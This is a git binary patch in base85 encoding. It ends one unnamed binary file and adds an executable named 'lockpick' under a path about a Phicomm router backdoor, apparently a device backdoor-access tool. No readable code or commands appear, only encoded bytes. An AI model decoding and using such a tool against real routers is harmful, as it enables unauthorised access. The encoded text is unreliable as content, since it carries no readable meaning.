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
JDQYkOKLAZAZB76H

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/lockpick b/Phicomm/backdoor-lockpick_tra-2022-01/lockpick
new file mode 100755
index 0000000000000000000000000000000000000000..987e00a8365dda06de7308d2dcc3e406749c2dc8
GIT binary patch
literal 1002352
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
